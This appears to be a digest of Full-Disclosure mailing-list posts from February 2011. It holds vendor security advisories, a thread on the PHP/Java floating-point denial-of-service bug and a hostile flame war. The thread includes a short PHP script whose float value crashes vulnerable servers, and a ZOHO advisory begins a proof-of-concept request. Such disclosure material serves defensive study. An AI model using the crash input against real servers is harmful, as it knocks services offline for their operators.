[Full-disclosure] VMSA-2011-0003 Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX

[VMware Security team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
   VMware Security Advisory

Advisory ID:   VMSA-2011-0003
Synopsis:  Third party component updates for VMware vCenter
   Server, vCenter Update Manager, ESXi and ESX
Issue date:2011-02-10
Updated on:2011-02-10 (initial release of advisory)
CVE numbers:   --- Apache Tomcat ---
   CVE-2009-2693 CVE-2009-2901 CVE-2009-2902
   CVE-2009-3548 CVE-2010-2227 CVE-2010-1157
   --- Apache Tomcat Manager ---
   CVE-2010-2928
   --- cURL ---
   CVE-2010-0734
   --- COS Kernel ---
   CVE-2010-1084 CVE-2010-2066 CVE-2010-2070
   CVE-2010-2226 CVE-2010-2248 CVE-2010-2521
   CVE-2010-2524 CVE-2010-0008 CVE-2010-0415
   CVE-2010-0437 CVE-2009-4308 CVE-2010-0003
   CVE-2010-0007 CVE-2010-0307 CVE-2010-1086
   CVE-2010-0410 CVE-2010-0730 CVE-2010-1085
   CVE-2010-0291 CVE-2010-0622 CVE-2010-1087
   CVE-2010-1173 CVE-2010-1437 CVE-2010-1088
   CVE-2010-1187 CVE-2010-1436 CVE-2010-1641
   CVE-2010-3081
   --- Microsoft SQL Express ---
   CVE-2008-5416 CVE-2008-0085 CVE-2008-0086
   CVE-2008-0107 CVE-2008-0106
   --- OpenSSL ---
   CVE-2010-0740 CVE-2010-0433
   CVE-2010-3864 CVE-2010-2939
   --- Oracle (Sun) JRE ---
   CVE-2009-3555 CVE-2010-0082 CVE-2010-0084
   CVE-2010-0085 CVE-2010-0087 CVE-2010-0088
   CVE-2010-0089 CVE-2010-0090 CVE-2010-0091
   CVE-2010-0092 CVE-2010-0093 CVE-2010-0094
   CVE-2010-0095 CVE-2010-0837 CVE-2010-0838
   CVE-2010-0839 CVE-2010-0840 CVE-2010-0841
   CVE-2010-0842 CVE-2010-0843 CVE-2010-0844
   CVE-2010-0845 CVE-2010-0846 CVE-2010-0847
   CVE-2010-0848 CVE-2010-0849 CVE-2010-0850
   CVE-2010-0886 CVE-2010-3556 CVE-2010-3566
   CVE-2010-3567 CVE-2010-3550 CVE-2010-3561
   CVE-2010-3573 CVE-2010-3565 CVE-2010-3568
   CVE-2010-3569 CVE-2010-1321 CVE-2010-3548
   CVE-2010-3551 CVE-2010-3562 CVE-2010-3571
   CVE-2010-3554 CVE-2010-3559 CVE-2010-3572
   CVE-2010-3553 CVE-2010-3549 CVE-2010-3557
   CVE-2010-3541 CVE-2010-3574
   --- pam_krb5 ---
   CVE-2008-3825 CVE-2009-1384
- 

1. Summary

   Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere
   Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues.


2. Relevant releases

   vCenter Server 4.1 without Update 1,

   vCenter Update Manager 4.1 without Update 1,

   ESXi 4.1 without patch ESXi410-201101201-SG,

   ESX 4.1 without patch ESX410-201101201-SG.


3. Problem Description

 a. vCenter Server and vCenter Update Manager update Microsoft
SQL Server 2005 Express Edition to Service Pack 3

Microsoft SQL Server 2005 Express Edition (SQL Express)
distributed with vCenter Server 4.1 Update 1 and vCenter Update
Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2
to SQL Express Service Pack 3, to address multiple security
issues that exist in the earlier releases of Microsoft SQL Express.

Customers using other database solutions need not update for
these issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
Express Service Pack 3.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware Product   Running  Replace with/
ProductVersion   on   Apply Patch
=    ===  =
vCenter4.1   Windows  Update 1
vCenter4.0   Windows  affected, patch pending
VirtualCenter  2.5   Windows  affected, no patch planned

Update Manager 4.1   Windows  Update 1
Update Manager 4.0   Windows  affected, patch pending
Update Manager 1.0   Windows  affected, no patch planned

hosted *   any   any  not affected

ESXi   any   ESXi not affected

ESXany   ESX  not affected

  * Hosted products are VMware Workstation, Player, ACE, Fusion.

 b. vCenter Apache Tomcat Management Application Credential Disclosure

The Apache Tom

[Full-disclosure] KeySoft (BrailleNote Apex) 9.1 Fixes Gaping Security Hole

[Sabahattin Gucukoglu]

>From the release notes:

> Password protected login
> BrailleNote Apex can be password protected.  In case you forget your 
> password, you can contact our Technical Support services to obtain a password 
> unlock file. User identification and device serial number will be required. 
> For security purposes, ActiveSync is disabled at this stage.)
> 
> Improved security
> Access to communication protocols has been protected to prevent unwanted 
> access to file system. When password protection is activated, ActiveSync is 
> disabled. 
> 

I'll leave the reader to draw his/her own conclusions concerning the "Password 
protected login" feature, pausing only to doubt its usefulness in protecting my 
data when it doesn't use any encryption, but it's nice to know they've 
*finally* addressed the telnet/FTP problem.  And just in time for a shiny new 
release, too.  I'll be the most handsome web surfer at the local cafe.

Cheers,
Sabahattin

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-1061-1] iTALC vulnerability

[Kees Cook]

===
Ubuntu Security Notice USN-1061-1 February 11, 2011
italc vulnerability
CVE-2011-0724
===

A security issue affects the following Edubuntu releases:

Edubuntu 9.10
Edubuntu 10.04 LTS
Edubuntu 10.10

This advisory does not apply to the corresponding versions of
Ubuntu, Kubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Edubuntu 9.10:
  italc-client1:1.0.9.1-0ubuntu16.1

Edubuntu 10.04 LTS:
  italc-client1:1.0.9.1-0ubuntu18.10.04.1

Edubuntu 10.10:
  italc-client1:1.0.9.1-0ubuntu18.10.10.1

After a standard system update, if you had originally installed from
the Edubuntu Live DVD and the bad keys were found, you will need to
redistribute the newly generated public keys to your iTALC clients and
restart each session. For more details, see:
https://wiki.ubuntu.com/iTalc/Keys

Details follow:

Stéphane Graber discovered that the iTALC private keys shipped with the
Edubuntu Live DVD were not correctly regenerated once Edubuntu was
installed. If an iTALC client was installed with the vulnerable keys, a
remote attacker could gain control of the system. Only systems using keys
from the Edubuntu Live DVD were affected.


Updated packages for Edubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc_1.0.9.1-0ubuntu16.1.diff.gz
  Size/MD5:16671 1463aaba5c51b8cec0d60b95f748604e

http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc_1.0.9.1-0ubuntu16.1.dsc
  Size/MD5: 1920 08011f20c0f1ef67bc9585cb1e7b1afd

http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc_1.0.9.1.orig.tar.gz
  Size/MD5:  3294206 5acc6bd10139bc3e05e7106d27410e46

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_amd64.deb
  Size/MD5:   542156 64fb51a7bc9f270430816c26d9975087

http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_amd64.deb
  Size/MD5:  1104570 3ec712ffb519e2d435049fef207fd2c6

http://security.ubuntu.com/ubuntu/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_amd64.deb
  Size/MD5:   203938 2f304ef75066085440e3d212a8b369cb

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_i386.deb
  Size/MD5:   511854 8a7275b9a5d0bd04c72f3eb9ca1b331d

http://security.ubuntu.com/ubuntu/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_i386.deb
  Size/MD5:  1107262 d7cfffe6dac606775375e924a30e26f3

http://security.ubuntu.com/ubuntu/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_i386.deb
  Size/MD5:   205602 2cf1ef5e65abe30128c079c3f1449384

  armel architecture (ARM Architecture):


http://ports.ubuntu.com/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_armel.deb
  Size/MD5:   538896 eb7379ae546c8536ca02c89e2bca4ef8

http://ports.ubuntu.com/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_armel.deb
  Size/MD5:  1091678 5b7b38132f58ecc7888c1c1f2be2ec69

http://ports.ubuntu.com/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_armel.deb
  Size/MD5:   193496 3c34296c12cf3196c4461c5fb466e26d

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_lpia.deb
  Size/MD5:   517964 58315714b8f7ac8947d10c006e2338b7

http://ports.ubuntu.com/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_lpia.deb
  Size/MD5:  1112450 1e07a33fd32a2b39e2f98247fea1fd91

http://ports.ubuntu.com/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_lpia.deb
  Size/MD5:   207090 a8de2ff7e3a63d7941c907c6f7662327

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_powerpc.deb
  Size/MD5:   509256 6d3ab8b223c052daf61505e3699c548c

http://ports.ubuntu.com/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_powerpc.deb
  Size/MD5:  1104256 a60f8f7864eaccd3925ed159f9922a52

http://ports.ubuntu.com/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_powerpc.deb
  Size/MD5:   207212 3f17a9133c795d574afbcaab646c0a6a

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/i/italc/italc-client_1.0.9.1-0ubuntu16.1_sparc.deb
  Size/MD5:   535652 3b4d443d9c446be018420f8d24660ec7

http://ports.ubuntu.com/pool/main/i/italc/italc-master_1.0.9.1-0ubuntu16.1_sparc.deb
  Size/MD5:  1113496 a69b5373083c72ae1f7fee5a8ec1ad2d

http://ports.ubuntu.com/pool/main/i/italc/libitalc_1.0.9.1-0ubuntu16.1_sparc.deb
  Size/MD5:   199270 1d46750c6fdb042ebbc3fc8da0b87cc3

Updated packages for Edubuntu 10.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/universe/i/italc/italc

Re: [Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]

[Valdis . Kletnieks]

On Thu, 10 Feb 2011 11:39:57 EST, Leon Kaiser said:

> "Yay open source"?
> 
> http://gcc.gnu.org/bugzilla/show_bug.cgi?id=323

>From comment #2 on that bug:

State-Changed-Why: See any faq on numerical analysis that mentions the x86.
You are seeing the results of excess precision in the FPU.
Either change the rounding precision in the FPCR, or work
around the problem with -ffloat-store.

Let's look at the problematic line in the sample code:

if (y != y2) printf("error\n");

This will cause the printf to trigger if the two numbers are bitwise identical
down to the last bit.  If y and y2 were computed via different code paths, and
thus hit different patterns of rounding and truncation, they could easily be
different in the last bit or two (for example, 3.993428883437 and
3.993428883436).  It's been well understood since literally the 1950s that if
you're trying to do any serious floating-point computation, such comparisons
should usually be written as 'if (abs(y - y2) < epsilon)' for whatever value of
epsilon you're willing to accept as a fuzz factor.

Although it's probably possible to "fix" gcc to do the right thing for the test
case in the bug report, it's in general *not* possible to "fix" this in the
general case.  It just becomes a total mess of little special corner cases and
makes performance of both the optimizer and the generated code totally tank.

There's only a limited amount of things the compiler and optimizer can do to 
save
a programmer from improper numeric analysis.

For further details, read comment 109 and/or the paper referenced in
comment 96.  Many of the other comments are also relevant.



pgpJH8HYnkG4R.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2011-0103 - ZOHO ManageEngine ADSelfService multiple vulnerabilities

[CORE Security Technologies Advisories]

Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

ZOHO ManageEngine ADSelfService multiple vulnerabilities


1. *Advisory Information*

Title: ZOHO ManageEngine ADSelfService multiple vulnerabilities
Advisory ID: CORE-2011-0103
Advisory URL:
http://www.coresecurity.com/content/zoho-manageengine-vulnerabilities
Date published: 2011-02-10
Date of last update: 2011-02-10
Vendors contacted: ZOHO Corporation
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Protection Mechanism Failure [CWE-693], Authentication Issues
[CWE-287], Cross-Site Scripting (XSS) [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2010-3272, CVE-2010-3273, CVE-2010-3274


3. *Vulnerability Description*

ManageEngine ADSelfService Plus [1] is a secure, web-based, end-user
password reset management program. This software helps domain users to
perform self service password reset, self service account unlock and
employee self update of personal details (e.g. telephone numbers, etc)
in Microsoft Windows Active Directory. Administrators find it easy to
automate password resets, account unlocks while managing optimizing the
expenses associated with helpdesk calls.

The security question mechanism used for password recovery can be
weakened by tampering the HTTP POST request containing the answers,
allowing an attacker to pass the security check by guessing just one of
the security answers. Additionally, the CAPTCHA mechanism can be
bypassed in the same manner, enabling the automation of the guessing
attempts.

The security question mechanism can also be bypassed by changing the
flow of the application, skipping the security question mechanism and
sending a HTTP request requiring the password change immediately after
declaring which user is to run the recovery procedure.

Additionally, two cross site scripting vulnerabilities were found
related to search functions.


4. *Vulnerable packages*

   . ManageEngine ADSelfService Plus 4.4.
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . ManageEngine ADSelfService Plus 4.5 Build 4500 and above.


6. *Vendor Information, Solutions and Workarounds*

Core would like to thanks Manikandan.T [2] for giving us the following
detailed information about the way Zoho team has addressed the security
vulnerabilities highlighted in this document.


6.1. *Solution to the Weak security question mechanism*

[CVE-2010-3272] In addition to the Security Questions, the latest
version of ADSelfService Plus also includes an SMS Verification / Email
Verification mechanism. This adds an additional security while password.
Users must confirm the code sent to their mobile phones / email when
they are to reset password / unlock accounts.

The earlier Builds used URL based on Post Request which was considered
vulnerable. This has been replaced by a more secure Tokenizer mechanism.
This mechanism prevents "by-passing any process / steps involved in
password reset / account unlock". The Tokenizer mechanism mandates the
flow of addressing every process only in the defined sequence. This
implies that the "Hide_Captcha / quesList" fields cannot be altered; if
not, they do not follow the desired sequence.


6.2. *Solution to the Security question bypass*

[CVE-2010-3273] Earlier version of ADSelfService Plus checked the
validation only at the page where the user was present. Now Each and
Every step and also the previous steps are being validated. The
"Tokenizer Method" ensures that no steps are bypassed. It also ensures
that validation occurs at every level and also only in the sequence
desired.


6.3. *Solution to Cross site scripting vulnerabilities*

[CVE-2010-3274] Security Filters are used to prevent Cross Site
Scripting vulnerabilities. ADSelfService Plus now checks every input
provided by a user at all the pages including "Password Reset / Unlock
Account", Employee Search pages.


7. *Credits*

This vulnerability was discovered and researched by Ernesto Alvarez from
Core Security Technologies. The publication of this advisory was
coordinated by Fernando Miranda from Core Security Advisories team.


8. *Technical Description / Proof of Concept Code*

8.1. *Weak security question mechanism*

[CVE-2010-3272] The procedure to recover a lost password involves the
user answering a series of security questions set during enrollment.
After the recovery request and user ID have been sent, the system
requires the user to answer a certain number of security questions,
whose answers are then sent using a POST request, as seen below.

/-
POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1

Host: SERVER
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13)
Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,de

[Full-disclosure] [SECURITY] [DSA 2159-1] vlc security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2159-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
February 10, 2011  http://www.debian.org/security/faq
- -

Package: vlc
Vulnerability  : missing input sanitising
Problem type   : (local)remote
Debian-specific: no
CVE ID : CVE-2011-0531

Dan Rosenberg discovered that insufficient input validation in VLC's 
processing of Matroska/WebM containers could lead to the execution of 
arbitrary code. 

For the stable distribution (squeeze), this problem has been fixed in
version 1.1.3-1squeeze3.

The version of vlc in the oldstable distribution (lenny) is affected
by further issues and will be addressed in a followup DSA.

For the unstable distribution (sid), this problem has been fixed in
version 1.1.7-1.

We recommend that you upgrade your vlc packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAk1UayYACgkQXm3vHE4uylos6QCeLCU9ynXRns3mmNXdLlUHJcB3
WMwAoMHS56Fvdn4AZYoaoAGulzacvtV1
=ZweI
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[James Rankin]

Nettie (and that isn't a term of endearment - see
http://en.wiktionary.org/wiki/nettie)

Please bog off. You make me ashamed to be British. Anyone with a burgeoning
consultancy would shut the hell up about it, not bawl about it on FD.

I have to say that your trolling is first-class though. I am an FD lurker,
not a contributor, yet you have wound me up enough to respond. For that,
well done.

Now sod off. I am only a short train ride from your neck of the woods, and I
would love to kick your ass for plaguing my inbox again.

Adios,

On 10 February 2011 16:32, andrew.wallace wrote:

> Thankfully you are very rarely involved with public and private sector
> business talks in the UK, so the situation will probably never arise we are
> in the same board room.
>
> Stay in America and keep away from the UK is the best thing that could ever
> happen to you, because frankly meeting you would be a complete nightmare for
> me and I would find it hard to work with you on any meaningful level.
>
> One thing for sure is you have pissed me off with the way you speak to me
> via private email and your perceived perception of who I am, and what you
> think n3td3v is.
>
> Maybe in the beginning it seemed like disorganised non-sense to you, but it
> has evolved and shaped over the years with me and is now a serious force to
> be reckoned with and is able to compete with other consultancy orgainsations
> in the UK, now that there are serious consultants on board from the business
> and government sector in the UK, where we work on meaningful policy reform
> within organisations, to tighten security against foreign powers, terrorist
> attacks and other matters.
>
> To be perfectly honest, I would like to say, I think you've been reading
> mailing lists too much, a lot more goes on in industry than the stupid
> disclosure community, work actually gets done that is meaningful and
> satisfying when I come home at night.
>
> My advice to you is, stop reading mailing lists, get on with the physical
> industry and stop basing your views of people based on back and forward
> horse play people have have had between 2004-2009.
>
> That part of n3td3v is behind you, me and everyone, I removed the mailing
> list as a symbolic gesture to move on from that.
>
> I'm now a professional, consulting and liaising with other consultants in
> the UK in the public and private sector through the consortium, the
> consultants who ive had dealings with in the physical domain who have
> decided to join through knowing me in a working relationship.
>
> The organisation is nothing to do with what it might have been, n3td3v is
> rethought and matured, along with me.
>
> You couldn't possibly say the same orgainsation I started when I was 18 is
> going to be the same orgainsation today now that I'm 30, it isn't.
>
> I've changed, we've changed, the type of people I come into contact has
> changed through opportunities I've gained in the physical domain.
>
> n3td3v is very much nothing to do with anything online-based, but has
> shifted into the physical domain, in that, its people I actually know who I
> can shake hands with who are members.
>
> That is why the name was changed, the brand, its now a consortium, its
> nothing to do with online or some silly Google group mailing list.
>
> The beginning days of n3td3v between 2004-2009 and the Google group mailing
> list was used to pushed my name out into the industry to become known, you
> should be able to work with me in a meaningful working relationship if you
> ever had to through work commitments.
>
> Everyone else who I meet in the physical domain knows who I am, but they
> don't judge me for it, they shake my hand and move on with the problems in
> the industry that are needing solved.
>
> They don't say, that's Andrew who used to post in the disclosure community,
> let's huff and puff about it.
>
> They take me as I am in the physical domain, realise it was silly horse
> play from the past and move on.
>
> I hope you are able to do the same, because your attitude just annoys me
> that you cannot have a mature and professional approach in the way you talk
> with me.
>
> Andrew
>
>


-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

*IMPORTANT: This email is intended for the use of the individual
addressee(s) named above and may contain information that is confidential,
privileged or unsuitable for overly sensitive persons with low self-esteem,
no sense of humour or irrational religious beliefs. If you are not the
intended recipient, any dissemination, distribution or copying of this email
is not authorised (either explicitly or implicitly) and constitutes an
irritating social faux pas.

Unless the word absquatulation has been used in its correct context
somewhere other than in this warning, it does not have a

Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

[David Klein]

And where can I register a public domain 

 

Regards,

 

David Klein

IP Focus

 

From: Christian Sciberras [mailto:uuf6...@gmail.com] 
Sent: Friday, February 11, 2011 4:39 AM
To: andrew.wallace
Cc: valdis.kletni...@vt.edu; Georgi Guninski; huj huj huj;
"david.kl...@ipfocus.com.au"; "kz2...@googlemail.com"; mcass...@gmail.com;
"full-disclosure@lists.grok.org.uk"
Subject: Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)

 

One question. Who's "you" that you keep referring to all the time?





On Thu, Feb 10, 2011 at 5:44 PM, andrew.wallace
 wrote:

Thankfully you are very rarely involved with public and private sector
business talks in the UK, so the situation will probably never arise we are
in the same board room.

Stay in America and keep away from the UK is the best thing that could ever
happen to you, because frankly meeting you would be a complete nightmare for
me and I would find it hard to work with you on any meaningful level.

One thing for sure is you have pissed me off with the way you speak to me
via private email and your perceived perception of who I am, and what you
think n3td3v is.

Maybe in the beginning it seemed like disorganised non-sense to you, but it
has evolved and shaped over the years with me and is now a serious force to
be reckoned with and is able to compete with other consultancy orgainsations
in the UK, now that there are serious consultants on board from the business
and government sector in the UK, where we work on meaningful policy reform
within organisations, to tighten security against foreign powers, terrorist
attacks and other matters.

To be perfectly honest, I would like to say, I think you've been reading
mailing lists too much, a lot more goes on in industry than the stupid
disclosure community, work actually gets done that is meaningful and
satisfying when I come home at night.

My advice to you is, stop reading mailing lists, get on with the physical
industry and stop basing your views of people based on back and forward
horse play people have have had between 2004-2009.

That part of n3td3v is behind you, me and everyone, I removed the mailing
list as a symbolic gesture to move on from that.

I'm now a professional, consulting and liaising with other consultants in
the UK in the public and private sector through the consortium, the
consultants who ive had dealings with in the physical domain who have
decided to join through knowing me in a working relationship.

The organisation is nothing to do with what it might have been, n3td3v is
rethought and matured, along with me.

You couldn't possibly say the same orgainsation I started when I was 18 is
going to be the same orgainsation today now that I'm 30, it isn't.

I've changed, we've changed, the type of people I come into contact has
changed through opportunities I've gained in the physical domain.

n3td3v is very much nothing to do with anything online-based, but has
shifted into the physical domain, in that, its people I actually know who I
can shake hands with who are members.

That is why the name was changed, the brand, its now a consortium, its
nothing to do with online or some silly Google group mailing list.

The beginning days of n3td3v between 2004-2009 and the Google group mailing
list was used to push my name out into the industry to become known, you
should be able to work with me in a meaningful working relationship if you
ever had to through work commitments.



Everyone else who I meet in the physical domain knows who I am, but they
don't judge me for it, they shake my hand and move on with the problems in
the industry that are needing solved.

They don't say, that's Andrew who used to post in the disclosure community,
let's huff and puff about it.

They take me as I am in the physical domain, realise it was silly horse play
from the past and move on.

I hope you are able to do the same, because your attitude just annoys me
that you cannot have a mature and professional approach in the way you talk
with me.

Andrew

 

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]

[Leon Kaiser]

From: Leon Kaiser 
Reply-to: litera...@gnaa.eu
To: Cal Leeming [Simplicity Media Ltd]

Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
Date: Wed, 09 Feb 2011 19:15:36 -0500

Years, if I'm not mistaken.


Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
   http://gnaa.eu || http://security.goatse.fr
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer
 



> On Wed, 2011-02-09 at 20:00 +, Cal Leeming [Simplicity Media Ltd]
> wrote:
> 
> > Christian, this issue has been 'floating' around for several months
> > now.
> > 
> > On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras
> >  wrote:
> > 
> > Ah, been reading more about it, seems it was fixed.
> > 
> > Still, there should have been safeguards around this - I'm
> > thinking they should check existing conversion routines to
> > ensure they're safe...
> > 
> > 
> > 
> > 
> > 
> > On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras
> >  wrote:
> > 
> > Was it fixed? What's the current status?
> > 
> > The sounds like a major issue, and the lack of info
> > about it is darn impressive.
> > 
> > 
> > I tried it on my test Windows WAMP server:
> > 
> >  > 
> > ob_implicit_flush(true);
> > 
> > echo 'Start test...';
> > 
> > $f=(float)"2.2250738585072011e-308";
> > echo 'Try 1 => '.$f.'';
> > 
> > $f=floatval("2.2250738585072011e-308");
> > echo 'Try 2 => '.$f.'';
> > 
> > $f="2.2250738585072011e-308";
> > echo 'Try 3 => '.(float)$f.'';
> > 
> > echo 'Test failed, server not vulnerable!';
> > 
> > ?>
> > 
> > All three tests succeeded in crashing the server.
> > 
> > With all due respect, this should NOT have been
> > disclosed without being FIXED (as it seems to me).
> > Plus, I'm a bit amazed such a bug exists in PHP -
> > since converting to floating point is a trivial
> > operation, it should have been limited and
> > safe-guarded from the start.
> > There are a lot of servers out there happily
> > accepting input as floating point values, this bug
> > should be top priority...
> > 
> > 
> > Chris.
> > 
> > 
> > 
> > On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser
> >  wrote:
> > 
> > 
> > 
> > http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
> > 
> > http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
> > 
> > 
> > 
> > 
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> > 
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> > http://secunia.com/ 
> > 
> > 
> > 
> > 
> > 
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/ 
> > 
> > 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]

[Leon Kaiser]

From: Leon Kaiser 
Reply-to: litera...@gnaa.eu
To: DiKKy Heartiez 
Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
Date: Wed, 09 Feb 2011 20:58:42 -0500

The best part is that gcc devs have refused to fix it for over a decade.

Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
   http://gnaa.eu || http://security.goatse.fr
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer


> On Wed, 2011-02-09 at 19:38 +, DiKKy Heartiez wrote:
> 
> > Breakin' fuckin' news!  (Or not!)  One of those stories is over a
> > month old, the other is over a week old.  Nothing particularly
> > exciting or unexpected in either.  It's just typical GPL code
> > quality.
> > 
> > 
> > 
> > 
> > From: litera...@gmail.com
> > To: full-disclosure@lists.grok.org.uk
> > Date: Wed, 9 Feb 2011 12:40:54 -0500
> > Subject: [Full-disclosure] {Java,PHP} Server Exploits
> > 
> > http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
> > http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
> > 
> > 
> > 
> > 
> > ___ Full-Disclosure - We
> > believe in it. Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> > sponsored by Secunia - http://secunia.com/ 
> > 
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [Fwd: Re: {Java,PHP} Server Exploits]

[Leon Kaiser]

From: Leon Kaiser 
Reply-to: litera...@gnaa.eu
To: Yorian Wiltjer 
Subject: Re: [Full-disclosure] {Java,PHP} Server Exploits
Date: Thu, 10 Feb 2011 08:34:02 -0500

"Yay open source"?

http://gcc.gnu.org/bugzilla/show_bug.cgi?id=323

Reported:
2000-06-14 14:16 UTC by mirtich
Modified:
2011-01-13 22:06 UTC (History)
Status:
SUSPENDED


Leon Kaiser  - Head of GNAA Public Relations -
litera...@gnaa.eu || litera...@goatse.fr
   http://gnaa.eu || http://security.goatse.fr
  7BEECD8D FCBED526 F7960173 459111CE F01F9923
"The mask of anonymity is not intensely constructive."
   -- Andrew "weev" Auernheimer

On Thu, 2011-02-10 at 11:20 +0100, Yorian Wiltjer wrote: 

> Too all,
> 
> 
> PHP version fixed in version 5.3.5 and 5.2.17 released on Jan 6th
> 2011.
> And bug only in the 32-bit version off PHP (even on 64bit a cpu)
> http://www.php.net/archive/2011.php#id2011-01-06-1
> 
> 
> Le reg report that oracle fixed the mark of the beast in there new
> patch.
> After it been there for 10 years.
> http://www.theregister.co.uk/2011/02/09/java_floating_point_bug_fixed/
> 
> 
> php devteam time one month
> java developers about te years
> 
> 
> So yay opensource.
> 
> 
> With friendly greetings,
> Yorian
> 
> 
> PS,
> Don't forget to upgrade
> 
> 2011/2/10 Troy Aerojam 
> 
> > It borders idiocy this hasn't been plugged.
> > 
> > Aerojam
> > 
> > --- On Wed, 2/9/11, Leon Kaiser  wrote:
> > 
> > 
> > From: Leon Kaiser 
